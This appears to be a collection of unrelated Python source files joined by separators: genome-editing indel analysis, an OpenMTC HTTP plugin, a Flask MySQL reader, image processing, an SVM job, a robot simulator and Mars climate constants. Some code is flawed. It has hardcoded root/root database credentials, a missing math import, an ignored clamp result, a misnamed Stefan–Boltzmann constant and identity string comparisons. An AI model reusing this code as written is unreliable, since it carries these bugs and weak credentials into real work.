iDelete_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iDeletion_pos) + 'D')
return iDelete_count
def _MakeAndStoreQuality(self, sName, sSeq, lQual, dResult, sBarcode):
listResultFASTQ = [sName, sSeq, '+', ''.join(chr(i + 33) for i in lQual)]
dResult[sBarcode][self.intTotalFastq].append(listResultFASTQ)
return listResultFASTQ
def _FixPos(self, lTarget_indel_result, iTarget_start_from_barcode):
lTrimmed_target_indel_result = []
for sINDEL in lTarget_indel_result:
# B - A is not included B position, so +1
iMatch_target_start = int(sINDEL.split('M')[0]) - iTarget_start_from_barcode
""" This part determines a deletion range.
^ current match pos
AGCTACGATCAGCATCTGACTTACTTC[barcode]
^ fix the match start at here. (target region)
AGCTACGATCAGCATC TGACTTACTTC[barcode]
if iMatch_target_start < 0:
sContinue = 1
But, this method has some problems.
^ barcode start
AGCTACGATCAGCAT*********C[barcode]
Like this pattern doesn't seleted. because, deletion checking is begun the target region start position.
Thus, I have fixed this problem.
"""
if iMatch_target_start <= -(iTarget_start_from_barcode):
# print(iMatch_target_start, iTarget_start_from_barcode)
continue
lTrimmed_target_indel_result.append(str(iMatch_target_start) + 'M' + sINDEL.split('M')[1])
# filter end
return lTrimmed_target_indel_result
def _StoreToDictResult(self, sRef_seq_after_barcode, sQuery_seq_after_barcode, iTarget_start_from_barcode,
dResult, sBarcode, lTrimmed_target_indel_result, sTarget_region, sRef_needle_ori, sQuery_needle_ori,
iInsert_count, iDelete_count, iComplex_count, listResultFASTQ):
sRef_seq_after_barcode = sRef_seq_after_barcode[iTarget_start_from_barcode:]
sQuery_seq_after_barcode = sQuery_seq_after_barcode[iTarget_start_from_barcode:]
dResult[sBarcode][self.intIndelInfo].append([sRef_seq_after_barcode, sQuery_seq_after_barcode, lTrimmed_target_indel_result,
sTarget_region, sRef_needle_ori, sQuery_needle_ori])
if iInsert_count:
dResult[sBarcode][self.intInsFastq].append(listResultFASTQ)
elif iDelete_count:
dResult[sBarcode][self.intDelFastq].append(listResultFASTQ)
elif iComplex_count:
dResult[sBarcode][self.intComFastq].append(listResultFASTQ)
return (sRef_seq_after_barcode, sQuery_seq_after_barcode)
def CalculateIndelFrequency(self, dResult):
dResult_INDEL_freq = {}
for sBarcode, lValue in dResult.items(): # lValue[gINDEL_info] : [[sRef_seq_after_barcode, sQuery_seq_after_barcode, lTarget_indel_result, sTarget_region], ..])
sRef_seq_loop = ''
llINDEL_store = [] # ['ACAGACAGA', ['20M2I', '23M3D']]
dINDEL_freq = {}
if lValue[self.intIndelInfo]:
for sRef_seq_loop, sQuery_seq, lINDEL, sTarget_region, sRef_needle, sQuery_needle in lValue[self.intIndelInfo]: # llINDEL : [['20M2I', '23M3D'], ...]
# print 'lINDEL', lINDEL
for sINDEL in lINDEL:
llINDEL_store.append([sQuery_seq, sINDEL, sRef_needle, sQuery_needle])
iTotal = len([lINDEL for sQuery_seq, lINDEL, sRef_needle, sQuery_needle in llINDEL_store])
for sQuery_seq, sINDEL, sRef_needle, sQuery_needle in llINDEL_store:
dINDEL_freq[sINDEL] = [[], 0, [], []]
for sQuery_seq, sINDEL, sRef_needle, sQuery_needle in llINDEL_store:
dINDEL_freq[sINDEL][1] += 1
dINDEL_freq[sINDEL][0].append(sQuery_seq)
dINDEL_freq[sINDEL][2].append(sRef_needle)
dINDEL_freq[sINDEL][3].append(sQuery_needle)
for sINDEL in dINDEL_freq:
lQuery = dINDEL_freq[sINDEL][0]
iFreq = dINDEL_freq[sINDEL][1]
lRef_needle = dINDEL_freq[sINDEL][2]
lQuery_needle = dINDEL_freq[sINDEL][3]
try:
dResult_INDEL_freq[sBarcode].append([sRef_seq_loop, lQuery, sINDEL, float(iFreq) / iTotal,
sTarget_region, lRef_needle, lQuery_needle])
except (KeyError, TypeError, AttributeError) as e:
dResult_INDEL_freq[sBarcode] = []
dResult_INDEL_freq[sBarcode].append([sRef_seq_loop, lQuery, sINDEL, float(iFreq) / iTotal,
sTarget_region, lRef_needle, lQuery_needle])
# end: if lValue[gINDEL_info]
# end: for sBarcode, lValue
return dResult_INDEL_freq
# end1: return
# end: def
#END:class
class clsOutputMaker(object):
def __init__(self, InstParameter):
self.strOutputdir = InstParameter.strOutputdir
self.strForwardFqPath = InstParameter.strForwardFqPath
def MakePickleOutput(self, dictResult, dictResultIndelFreq, strBarcodePamPos=''):
dictOutput = {'dictResult': dictResult,
'dictResultIndelFreq': dictResultIndelFreq,
'strBarcodePamPos': strBarcodePamPos}
with open('{outdir}/Tmp/Pickle/{fq}.pickle'.format(outdir=self.strOutputdir, fq=os.path.basename(self.strForwardFqPath)), 'wb') as Pickle:
pickle.dump(dictOutput, Pickle)
def Main():
InstParameter = clsParameter()
logging.basicConfig(format='%(process)d %(levelname)s %(asctime)s : %(message)s',
level=logging.DEBUG,
filename=InstParameter.strLogPath,
filemode='a')
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
logging.info('Program start : %s' % InstParameter.strForwardFqPath)
logging.info('File Open')
InstFileOpen = clsFastqOpener(InstParameter)
listFastqForward = InstFileOpen.OpenFastqForward()
if InstParameter.strPair == 'True':
listFastqReverse = InstFileOpen.OpenFastqReverse()
InstIndelSearch = clsIndelSearchParser(InstParameter)
InstOutput = clsOutputMaker(InstParameter)
if InstParameter.strPamType == 'CPF1':
logging.info('Search barcode INDEL pos')
dRef, dResult = InstIndelSearch.SearchBarcodeIndelPosition(InstParameter.strBarcodePamPos) # ref check.
logging.info('Search INDEL forward')
dResultForward = InstIndelSearch.SearchIndel(listFastqForward, dRef, dResult)
if InstParameter.strPair == 'True':
logging.info('Search INDEL reverse')
dResultReverse = InstIndelSearch.SearchIndel(listFastqReverse, dRef, dResultForward)
logging.info('Calculate INDEL frequency')
dictResultIndelFreq = InstIndelSearch.CalculateIndelFrequency(dResultReverse)
logging.info('Make pickle output forward')
InstOutput.MakePickleOutput(dResultReverse, dictResultIndelFreq)
else:
logging.info('Calculate INDEL frequency')
dictResultIndelFreq = InstIndelSearch.CalculateIndelFrequency(dResultForward)
logging.info('Make pickle output forward')
InstOutput.MakePickleOutput(dResultForward, dictResultIndelFreq)
elif InstParameter.strPamType == 'CAS9':
logging.info('Search barcode INDEL pos')
dRef, dResult = InstIndelSearch.SearchBarcodeIndelPosition(InstParameter.strBarcodePamPos)
logging.info('Search INDEL')
dResult_forward = InstIndelSearch.SearchIndel(listFastqForward, dRef, dResult, InstParameter.strBarcodePamPos)
logging.info('Calculate INDEL frequency')
dResult_INDEL_freq = InstIndelSearch.CalculateIndelFrequency(dResult_forward)
logging.info('Make pickle output forward')
InstOutput.MakePickleOutput(dResult_forward, dResult_INDEL_freq, InstParameter.strBarcodePamPos)
logging.info('Program end : %s' % InstParameter.strForwardFqPath)
#END:def
if __name__ == '__main__':
Main()
|
from . import api, nav, data, stream
|
from gevent.pywsgi import Input
from gevent.wsgi import WSGIServer
from urlparse import urlparse
from netifaces import ifaddresses, interfaces
from socket import getnameinfo, gaierror, getservbyname, AF_INET, AF_INET6
from time import time
from socket import error as SocketError
from funcy import pluck
from geventhttpclient.client import HTTPClient
from openmtc_server.Plugin import Plugin
from .wsgi import OpenMTCWSGIApplication
from openmtc_server.platform.gevent.ServerRack import GEventServerRack
from aplus import Promise
from openmtc_server.exc import ConfigurationError
from openmtc_server.transportdomain import (Response, ErrorResponse,
RequestMethod, Connector)
from futile.caching import LRUCache
from openmtc.exc import OpenMTCNetworkError, ConnectionFailed
from openmtc_server.configuration import (Configuration, ListOption,
SimpleOption, BooleanOption)
class ConnectorConfiguration(Configuration):
__name__ = "Connector configuration"
__options__ = {"interface": SimpleOption(default=""),
"host": SimpleOption(default=None),
"port": SimpleOption(int),
"is_wan": BooleanOption(default=None)}
class HTTPTransportPluginGatewayConfiguration(Configuration):
__name__ = "HTTPTransportPluginGatewayConfiguration configuration"
__options__ = {
"connectors": ListOption(ConnectorConfiguration,
default=(
ConnectorConfiguration(port=5000,
is_wan=False),
ConnectorConfiguration(port=4000,
is_wan=True)))
}
class HTTPTransportPluginBackendConfiguration(Configuration):
__name__ = "HTTPTransportPluginBackendConfiguration configuration"
__options__ = {
"connectors": ListOption(ConnectorConfiguration,
default=(
ConnectorConfiguration(port=15000,
is_wan=False),
ConnectorConfiguration(port=14000,
is_wan=True)))
}
class HTTPTransportPlugin(Plugin):
ERROR_RESPONSE_MAX = 320
__gateway_configuration__ = HTTPTransportPluginGatewayConfiguration
__backend_configuration__ = HTTPTransportPluginBackendConfiguration
def _init(self):
# TODO: make max_items configurable
self._clients = LRUCache(threadsafe=False)
self.api.register_client(("http", "https"), self.send_request)
self._initialized()
__methodmap = {
RequestMethod.create: "POST",
RequestMethod.delete: "DELETE",
RequestMethod.update: "PUT",
RequestMethod.retrieve: "GET"
}
def _get_error_message(self, response, content_type=None):
try:
data = response.read(self.ERROR_RESPONSE_MAX and
self.ERROR_RESPONSE_MAX + 1 or
None)
if not data:
data = "<no further information available>"
elif (self.ERROR_RESPONSE_MAX and
len(data) > self.ERROR_RESPONSE_MAX):
data = data[:self.ERROR_RESPONSE_MAX] + " (truncated)\n"
data = data.encode("utf-8")
except Exception as e:
data = "<failed to read error response: %s>\n" % (e, )
if not data.endswith("\n") and content_type is 'text/plain':
data += "\n"
return data
def _get_client(self, parsed_url):
https = parsed_url.scheme[-1].lower() == "s"
port = parsed_url.port or (https and 443 or 80)
host = parsed_url.hostname
key = (host, port, https)
try:
return self._clients[key]
except KeyError:
# TODO: make connection_timeout and concurrency configurable
client = self._clients[key] = HTTPClient(host, port,
connection_timeout=120.0,
concurrency=50,
ssl=https)
return client
def _handle_network_error(self, exc, p, method, parsed, path, t,
exc_class=OpenMTCNetworkError):
error_str = str(exc)
if error_str in ("", "''"):
error_str = repr(exc)
logpath = "%s://%s%s" % (parsed.scheme, parsed.netloc, path)
error_msg = "Error during HTTP request: %s. " \
"Request was: %s %s (%.4fs)" % (error_str, method,
logpath, time() - t)
p.reject(exc_class(error_msg))
def send_request(self, request):
with Promise() as p:
# TODO: caching of clients and answers
# TODO: set accept
# TODO: set auth
# TODO: other headers?
# TODO: params
fullpath = request.path
parsed = urlparse(fullpath)
client = self._get_client(parsed)
method = self.__methodmap[request.method]
payload = request.payload
if payload:
headers = {"Content-Type": request.content_type}
# TODO: do we need to set Content-Length?
else:
headers = {}
t = time()
if request.originator:
headers["From"] = request.originator
if request.metadata:
for k, v in request.metadata.items():
headers[k] = v
path = parsed.path
self.logger.debug("Request params: %s", request.params)
if request.params:
path += "?"
param_str = [k + "=" + str(v) for
k, v in request.params.items()]
path += "&".join(param_str)
self.logger.debug("%s %s (%s)\n%r", method, path, headers,
request.payload)
try:
# FIXME: rst: geventhttpclient host header is not ipv6 safe
# it is missing the brackets around the IP
# our notification server is ignoring it but other servers could
# handle this as an error and it is not correct wrt the standard
headers['Host'] = parsed.netloc
payload = request.payload
# this was a try/catch block before, but broke the code
# TODO: if openmtc can have streams here, too, those also have
# TODO: to be dealt with
if type(payload) is Input:
payload = payload.read()
response = client.request(method, path, payload, headers)
except (SocketError, gaierror) as exc:
self._handle_network_error(exc, p, method, parsed, path, t,
ConnectionFailed)
except Exception as exc:
self.logger.exception("Error in HTTP request")
self._handle_network_error(exc, p, method, parsed, path, t)
else:
try:
status_code = response.get_code()
content_type = response.get("Content-Type")
self.logger.debug("%s %s result: %s (%.4fs)", method,
fullpath, status_code, time() - t)
self.logger.debug("Response headers: %s", response.items())
if status_code >= 400:
data = self._get_error_message(response, content_type)
if content_type is 'text/plain':
msg = "Error during execution: %s - %s" \
"Request was: %s %s." % (status_code, data,
method, request.path)
p.reject(ErrorResponse(status_code, msg,
"text/plain"))
else:
p.reject(ErrorResponse(
status_code, data, content_type,
metadata=dict(response.headers)))
elif status_code < 200 or status_code >= 300:
raise OpenMTCNetworkError(status_code)
else:
p.fulfill(Response(status_code, response.read() or None,
content_type, location=response.get(
"Location") or response.get(
"Content-Location"),
metadata=dict(response.headers)))
finally:
response.release()
return p
def _find_address(self, address, family):
localhost = None
for interface in interfaces():
try:
ifdata = ifaddresses(interface)[family]
addresses = pluck("addr", ifdata)
except KeyError:
pass
else:
if addresses:
for a in addresses:
if a not in ("::1", "127.0.0.1"):
return a.rsplit("%", 1)[0]
if a:
localhost = a
if localhost:
return localhost
raise Exception("Failed to guess host for interface '%s'", address)
def _find_addresses(self, family):
addresses = []
for interface in interfaces():
try:
ifdata = ifaddresses(interface)[family]
addresses += pluck("addr", ifdata)
except KeyError:
pass
return [a.rsplit("%", 1)[0] for a in addresses]
def _guess_host(self, address):
if address not in ("::", "", "0.0.0.0"):
if ":" in address:
return "[" + address + "]"
return address
family = address == "::" and AF_INET6 or AF_INET
host = self._find_address(address, family)
if family == AF_INET6:
return "[" + host + "]"
return host
def _guess_alternatives(self, address):
if address not in ("::", "", "0.0.0.0"):
return None
hosts = self._find_addresses(AF_INET)
for a in hosts[:]:
self.logger.debug("Finding hostname for %s", a)
try:
host = getnameinfo((a, 0), 0)[0]
except Exception as e:
self.logger.warn("Failed to lookup name for address %s: %s",
address, e)
else:
if host != a:
hosts.append(host)
if address == "::":
hosts.append("[::]")
ipv6addresses = self._find_addresses(AF_INET6)
for address in ipv6addresses:
hosts.append("[" + address.split("%")[0] + "]")
self.logger.debug("Finding hostname for %s", address)
try:
host = getnameinfo((address, 0), 0)[0]
except Exception as e:
self.logger.warn("Failed to lookup address %s: %s",
address, e)
else:
if host != address:
hosts.append(host)
else:
hosts.append("0.0.0.0")
return hosts
def _start(self):
servers = []
additional_hostnames = self.config["global"].get(
"additional_hostnames", [])
if not isinstance(additional_hostnames, list):
raise ConfigurationError("additional_hostnames is not a list")
require_auth = self.config["global"].get("require_auth", True)
for endpoint in self.config.get("connectors", []):
interface = endpoint["interface"]
port = endpoint["port"]
host = endpoint["host"]
keyfile = endpoint.get("key")
certfile = endpoint.get("crt")
if not host:
host = self._guess_host(interface)
self.logger.info("No host specified for connector on '%s'. "
"Guessing %s", interface, host)
connectors = self._guess_alternatives(interface)
else:
connectors = []
is_https = keyfile and certfile
scheme = "https" if is_https else "http"
base_uri = "%s://%s:%s" % (scheme, host, port)
connectors = ["%s://%s:%s" % (scheme, host, port)
for host in connectors]
default_port = getservbyname(scheme)
if port == default_port:
connectors.append("%s://%s" % (scheme, host))
for hostname in additional_hostnames:
alternative = "%s://%s" % (scheme, hostname)
parsed_alternative = urlparse(alternative)
alternative_port = parsed_alternative.port
if alternative_port in (None, ''):
alternative_port = port
alternative = "%s:%s" % (alternative, port)
connectors.append(alternative)
if alternative_port == default_port:
connectors.append("%s://%s" %
(scheme,
parsed_alternative.hostname))
if endpoint.is_wan is None:
# TODO: guess if an interface is a WAN interface
raise NotImplementedError()
connector = Connector(base_uri, connectors, endpoint.is_wan)
application = OpenMTCWSGIApplication(self.api.handle_request,
connector=connector,
server_address=interface,
require_auth=require_auth)
if is_https:
servers.append(WSGIServer(
(interface, port), application,
environ={'SERVER_NAME': 'openmtc.local'},
keyfile=keyfile, certfile=certfile))
else:
servers.append(WSGIServer(
(interface, port), application,
environ={'SERVER_NAME': 'openmtc.local'}))
self.api.register_connector(connector)
rack = self.__rack = GEventServerRack(servers)
rack.start()
self._started()
def _stop(self):
self.__rack.stop()
self._stopped()
|
#Aplicação simples em Python que faz a leitura de um banco de dados mysql
from flask import Flask
from typing import List, Dict
import json
import mysql.connector
app = Flask(__name__)
def cores() -> List[Dict]:
config = {
'user': 'root',
'password': 'root',
'host': 'db',
'port': '3306',
'database': 'frutas'
}
con = mysql.connector.connect(**config)
cursor = con.cursor()
cursor.execute('SELECT * FROM cores')
res = [{nome: cor} for (nome, cor) in cursor]
cursor.close()
con.close()
return res
@app.route('/')
def index() -> str:
return json.dumps({'cores': cores()})
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
from color_detection.histogram import hsv
import cv2 as cv
import numpy as np
class Threshold(hsv):
def __init__(self):
hsv.__init__(self)
def assign(self, img):
self.img = img
self.img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)
self._hsv__assign(self.img_hsv)
def read_mask(self):
return cv.inRange(self.img_hsv,
np.array([self.hue.range[0],
self.sat.range[0],
self.val.range[0]]),
np.array([self.hue.range[1],
self.sat.range[1],
self.val.range[1]]))
def read(self):
return cv.bitwise_or(self.img, self.img, mask=self.read_mask())
def update(self, filter):
if self.__filter(filter):
self.sat.value, self.sat.range, _ = \
self.find_sat()
self.val.value, self.val.range, _ = \
self.find_val()
else:
self.sat.value = 0
self.sat.range = np.zeros(2)
self.val.value = 0
self.val.range = np.zeros(2)
def __filter(self, filter):
if self.hue.color != "red":
# Filter hue from histogram
self.hue.value, self.hue.range, retval = \
self.find_hue(filter)
if retval == -1:
# Masking
mask = cv.inRange(
self.img_hsv,
np.array([self.hue.range[0],
self.sat.find_range[0],
self.val.find_range[0]]),
np.array([self.hue.range[1],
self.sat.find_range[1],
self.val.find_range[1]]))
self.img_hsv_filtered = cv.bitwise_and(
self.img_hsv, self.img_hsv, mask=mask
)
self._hsv__assign(self.img_hsv_filtered)
return retval == -1
|
import QuantumSystem as qs
import unittest
class TestClasicoCuamtico(unittest.TestCase):
def test_transational_amplitude(self):
result = qs.Transitional_amplitude([[((2**0.5/2),0),(0,(2**0.5/2))]],[[(0,(2**0.5/2)),(-(2**0.5/2),0)]])
self.assertEqual(result,(0.0, -1.0))
def test_specific_position(self):
result = qs.probability_specific_position([(-3,-1),(0,-2),(0,1),(2,0)],2)
self.assertEqual(result,0.052632)
if __name__ == '__main__':
unittest.main()
|
"""
Module with definitions for image transformations such as rotations and dilations
"""
import cv2
import numpy as np
def resize_to_target(img, width, height):
"""
Return resized img to given width and height dimensions
"""
dim = (width, height)
resized = cv2.resize(img, dim)
return resized
def rotate_image(image, angle):
"""
Return image rotated counterclockwise by angle (degrees).
Finds the center of image, calculates the transformation matrix, and applies to the image
"""
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(
(image_center[0], image_center[1]), angle, 1.0)
result = cv2.warpAffine(
image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
|
"""
Linear SVM with MapReduce
Algorithm builds a model with continuous features and predicts binary target label (-1, 1).
Reference
Algorithm is proposed by Glenn Fung, O. L. Mangasarian. Incremental Support Vector Machine Classification. Description of algorithm can be found at ftp://ftp.cs.wisc.edu/pub/dmi/tech-reports/01-08.pdf.
"""
def simple_init(interface, params):
return params
def map_fit(interface, state, label, inp):
"""
Function calculates matrices ete and etde for every sample, aggregates and output them.
"""
import numpy as np
ete, etde = 0, 0
out = interface.output(0)
for row in inp:
row = row.strip().split(state["delimiter"]) # split row
if len(row) > 1: # check if row is empty
# intercept term is added to every sample
x = np.array([(0 if v in state["missing_vals"] else float(v)) for i, v in enumerate(row) if
i in state["X_indices"]] + [-1])
# map label value to 1 or -1. If label does not match set error
y = 1 if state["y_map"][0] == row[state["y_index"]] else -1 if state["y_map"][1] == row[
state["y_index"]] else "Error"
ete += np.outer(x, x)
etde += x * y
out.add("etde", etde)
for i, row in enumerate(ete):
out.add(i, row)
def reduce_fit(interface, state, label, inp):
"""
Function joins all partially calculated matrices ETE and ETDe, aggregates them and it calculates final parameters.
"""
import numpy as np
out = interface.output(0)
sum_etde = 0
sum_ete = [0 for _ in range(len(state["X_indices"]) + 1)]
for key, value in inp:
if key == "etde":
sum_etde += value
else:
sum_ete[key] += value
sum_ete += np.true_divide(np.eye(len(sum_ete)), state["nu"])
out.add("params", np.linalg.lstsq(sum_ete, sum_etde)[0])
def map_predict(interface, state, label, inp):
import numpy as np
out = interface.output(0)
for row in inp:
row = row.strip().split(state["delimiter"])
if len(row) > 1:
# set id of current sample
x_id = "" if state["id_index"] == -1 else row[state["id_index"]]
# add intercept term
x = [(0 if v in state["missing_vals"] else float(v)) for i, v in enumerate(row) if
i in state["X_indices"]] + [-1]
# make a prediction with parameters
value = np.dot(x, state["fit_params"])
y = state["y_map"][0] if value >= 0 else state["y_map"][1]
out.add(x_id, (y,))
def fit(dataset, nu=0.1, save_results=True, show=False):
"""
Function starts a job for calculation of model parameters
Parameters
----------
input - dataset object with input urls and other parameters
nu - parameter to adjust the classifier
save_results - save results to ddfs
show - show info about job execution
Returns
-------
Urls of fit model results on ddfs
"""
from disco.worker.pipeline.worker import Worker, Stage
from disco.core import Job
if dataset.params["y_map"] == []:
raise Exception("Linear proximal SVM requires a target label mapping parameter.")
try:
nu = float(nu)
if nu <= 0:
raise Exception("Parameter nu should be greater than 0")
except ValueError:
raise Exception("Parameter should be numerical.")
job = Job(worker=Worker(save_results=save_results))
# job parallelizes mappers and joins them with one reducer
job.pipeline = [
("split", Stage("map", input_chain=dataset.params["input_chain"], init=simple_init, process=map_fit)),
('group_all', Stage("reduce", init=simple_init, process=reduce_fit, combine=True))]
job.params = dataset.params
job.params["nu"] = nu
job.run(name="linearsvm_fit", input=dataset.params["data_tag"])
fitmodel_url = job.wait(show=show)
return {"linsvm_fitmodel": fitmodel_url} # return results url
def predict(dataset, fitmodel_url, save_results=True, show=False):
"""
Function starts a job that makes predictions to input data with a given model.
Parameters
----------
input - dataset object with input urls and other parameters
fitmodel_url - model created in fit phase
save_results - save results to ddfs
show - show info about job execution
Returns
-------
Urls with predictions on ddfs
"""
from disco.worker.pipeline.worker import Worker, Stage
from disco.core import Job, result_iterator
if "linsvm_fitmodel" not in fitmodel_url:
raise Exception("Incorrect fit model.")
job = Job(worker=Worker(save_results=save_results))
# job parallelizes execution of mappers
job.pipeline = [
("split", Stage("map", input_chain=dataset.params["input_chain"], init=simple_init, process=map_predict))]
job.params = dataset.params
job.params["fit_params"] = [v for _, v in result_iterator(fitmodel_url["linsvm_fitmodel"])][0]
job.run(name="linsvm_predict", input=dataset.params["data_tag"])
return job.wait(show=show)
|
import numpy as np
import matplotlib.pyplot as plt
class Robot():
def __init__(self, time, x0, y0, tetta0, xf, yf, tettaf):
self.x_history = [x0]
self.y_history = [y0]
self.tetta_history = [tetta0]
self.time_history = [0.0]
self.control_history = [(0.0, 0.0)]
self.sim_time = time
self.xf = xf
self.yf = yf
self.tettaf = tettaf
self.eps = 0.01
self.control_func = None
self.dt = 0.01
def set_control_function(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.control_func = g
def set_dt(self, dt):
self.dt = dt
def simulate(self, dt=0.01):
t = dt
su = 0
x1, y1 = 5, 5 # obsticle with shape of circle with middle point at 5, 5
rad = 2.5 # radius
while t < self.sim_time:
new_x, new_y, new_tetta = self.__euler_step(dt)
if new_x == 1e+6 or new_y == 1e+6 or new_tetta == 1e+6: return 1e+6 # return right positive limit and exit
try:
dr = math.pow(rad, 2) - math.pow(x1 - new_x, 2) - math.pow(y1 - new_y, 2)
if dr > 0: su = su + 1
except: pass
estimation = self.estimate()
if estimation > 1e+6: return 1e+6
self.x_history.append(new_x)
self.y_history.append(new_y)
self.tetta_history.append(new_tetta)
self.time_history.append(t)
if estimation < self.eps: return t
t += dt
return self.sim_time + estimation + su * dt
def __euler_step(self, dt):
x, y, tetta = self.__get_current_coords()
dx, dy, dtetta = self.__get_right_parts(tetta)
if dx > 1e+6 or dy > 1e+6 or dtetta > 1e+6: return 1e+6, 1e+6, 1e+6
tilda_x = x + dt * dx
tilda_y = y + dt * dy
tilda_tetta = tetta + dt * dtetta
tdx, tdy, tdtetta = self.__get_right_parts(tilda_tetta)
x = x + (dx + tdx) * 0.5 * dt
y = y + (dy + tdy) * 0.5 * dt
tetta = tetta + (dtetta + tdtetta) * 0.5 * dt
return x, y, tetta
def __get_right_parts(self, tetta):
current_coords = self.__get_current_coords()
terminal_coords = self.__get_terminal_coords()
state = terminal_coords - current_coords
u1, u2 = self.control_func(state)
self.clip_control(u1) # TODO: set control limits inside __init__
self.clip_control(u2)
self.control_history.append((u1, u2))
right_x = (u1 + u2) * np.cos(tetta) * 0.5
right_y = (u1 + u2) * np.sin(tetta) * 0.5
right_tetta = (u1 - u2) * 0.5
return right_x, right_y, right_tetta
def clip_control(self, u):
if u < -10: return -10
elif u > 10: return 10
else: return u
def __get_current_coords(self,):
return np.array([self.x_history[-1], self.y_history[-1], self.tetta_history[-1]])
def __get_terminal_coords(self,):
return np.array([self.xf, self.yf, self.tettaf])
def estimate(self,):
v0 = self.__get_current_coords()
vf = self.__get_terminal_coords()
return np.linalg.norm(vf - v0)
def reset(self,):
self.x_history = [self.x_history[0]]
self.y_history = [self.y_history[0]]
self.tetta_history = [self.tetta_history[0]]
self.time_history = [0.0]
self.control_histroy = [(0.0, 0.0)]
def get_coords(self,):
return (self.x_history, self.y_history)
def get_control_in_time(self,):
return (self.time_history, self.control_history)
def plot_trajectory(self,):
x, y = self.get_coords()
fig = plt.figure()
plt.plot(x, y, 'r')
plt.xlabel('${x}$',fontsize=20)
plt.ylabel('${y}$',fontsize=20)
plt.legend(['${y}({x})$'],loc='upper right')
plt.show()
def plot_control_in_time(self,):
t, u = self.get_control_in_time()
fig = plt.figure()
plt.plot(t, u, 'b')
plt.xlabel('${t}$', fontsize=20)
plt.ylabel('${u}$', fontsize=20)
plt.legend(['${u}({t})$'],loc='upper right')
plt.show()
|
# ==== PHYSICS CONSTANTS ====
# BOLTZMAN
BOLTZMAN_CONSTANT = 5.6704 * (10 ** -8)
# KELVIN
DELTA_KELVIN = 273.15
# ==== SOFTWARE RELATED ====
SETTINGS_FILE_PATH = "settings.json"
SETTINGS_TEMPLATE_FILE_PATH = "settingsTemplate.json"
# ==== BASE SCI CONSTANTS ====
LAT_MARGINS = [-90, 90]
LON_MARGINS = [0, 360]
LON_STEPS_PER_LAT = 145
TABLE_HEADER = [
"Latitude",
"Longitude",
"Tsurfmx",
"Tsurfmn",
"Tsurfmx_Watt/m2",
"Tsurfmn_Watt/m2",
"AVG_Watt/m2",
"Lat_AVG_Tsurfmx_Watt/m2",
"Lat_AVG_Tsurfmn_Watt/m2",
"Lat_AVG_Watt/m2",
"Lat_Max_Tsurfmx_Watt/m2",
"Lat_Min_Tsurfmn_Watt/m2",
]
TSURFMX_DIR = "../data/tsurfmx/"
TSURFMN_DIR = "../data/tsurfmn/"
VALID_RECORD_TYPES = [
"t",
"p",
"rho",
"wind",
"w",
"u",
"v",
"tsurf",
"ps",
"tau",
"qdust",
"rdust",
"sdust",
"mtot",
"icetot",
"h2ovap",
"h2oice",
"rice",
"co2ice",
"groundice",
"pbl",
"stress",
"updraft",
"downdraft",
"pblwvar",
"pblhvar",
"ps_ddv",
"p_ddv",
"t_ddv",
"u_ddv",
"v_ddv",
"w_ddv",
"rho_ddv",
"tau_ddv",
"tsurfmx",
"tsurfmn",
"lwdown",
"swdown",
"lwup",
"swup",
"co2col",
"arcol",
"n2col",
"cocol",
"o3col",
"co2",
"ar",
"n2",
"co",
"o3",
"o",
"o2",
"hydro",
"hydro2",
"e",
"ecol",
"hecol",
"he",
"cp",
"visc",
]
RECORD_TYPES_TABLE = {
"t": "selected=" ">Temperature (K)",
"p": "Pressure (Pa)",
"rho": "Density (kg/m3)",
"wind": "Horizontal wind (m/s)",
"w": "Vertical wind (m/s, pos. when downward)",
"u": "W-E wind component (m/s)",
"v": "S-N wind component (m/s)",
"tsurf": "Surface temperature (K)",
"ps": "Surface pressure (Pa)",
"tau": "Dust column vis opt depth above surf",
"qdust": "Dust mass mixing ratio (kg/kg)",
"rdust": "Dust effective radius (m)",
"sdust": "Dust deposition on flat surface (kg/m2/s)",
"mtot": "Water vapor column (kg/m2)",
"icetot": "Water cloud ice column (kg/m2)",
"h2ovap": "Water vapor vol. mixing ratio (mol/mol)",
"h2oice": "Water ice mixing ratio (mol/mol)",
"rice": "Water ice effective radius (m)",
"co2ice": "surface CO2 ice layer (kg/m2)",
"groundice": "surface H2O ice layer (kg/m2, 0.5: perennial)",
"pbl": "Convective PBL height (m)",
"stress": "Surf. wind stress (Kg/m/s2)",
"updraft": "Max PBL updraft wind (m/s)",
"downdraft": "Max PBL downdraft wind (m/s)",
"pblwvar": "PBL vert wind variance (m2/s2)",
"pblhvar": "PBL eddy vert heat flux (m/s/K)",
"ps_ddv": "Surf. pres. day to day variability (Pa)",
"p_ddv": "Pressure day to day variability (Pa)",
"t_ddv": "Temperature day to day variability (K)",
"u_ddv": "zonal wind day to day variability (m/s)",
"v_ddv": "merid. wind day to day variability (m/s)",
"w_ddv": "vert. wind day to day variability (m/s)",
"rho_ddv": "density day to day variability (kg/m^3)",
"tau_ddv": "Dust column day to day variability",
"tsurfmx": "daily max mean surf temperature (K)",
"tsurfmn": "daily min mean surf temperature (K)",
"lwdown": "thermal IR flux to surface (W/m2)",
"swdown": "solar flux to surface (W/m2)",
"lwup": "thermal IR flux to space (W/m2)",
"swup": "solar flux reflected to space (W/m2)",
"co2col": "CO2 column (kg/m2)",
"arcol": "Ar column (kg/m2)",
"n2col": "N2 column (kg/m2)",
"cocol": "CO column (kg/m2)",
"o3col": "O3 column (kg/m2)",
"co2": "[CO2] vol. mixing ratio (mol/mol)",
"ar": "[Ar] vol. mixing ratio (mol/mol)",
"n2": "[N2] vol. mixing ratio (mol/mol)",
"co": "[CO] vol. mixing ratio (mol/mol)",
"o3": "[O3] ozone vol. mixing ratio (mol/mol)",
"o": "[O] vol. mixing ratio (mol/mol)",
"o2": "[O2] vol. mixing ratio (mol/mol)",
"hydro": "[H] vol. mixing ratio (mol/mol)",
"hydro2": "[H2] vol. mixing ratio (mol/mol)",
"e": "electron number density (cm-3)",
"ecol": "Total Electronic Content (TEC) (m-2)",
"hecol": "He column (kg/m2)",
"he": "[He] vol. mixing ratio (mol/mol)",
"cp": "Air heat capacity Cp (J kg-1 K-1)",
"visc": "Air viscosity estimation (N s m-2)",
}
|
class Tablet :
def __init__(self,tablet_proxy):
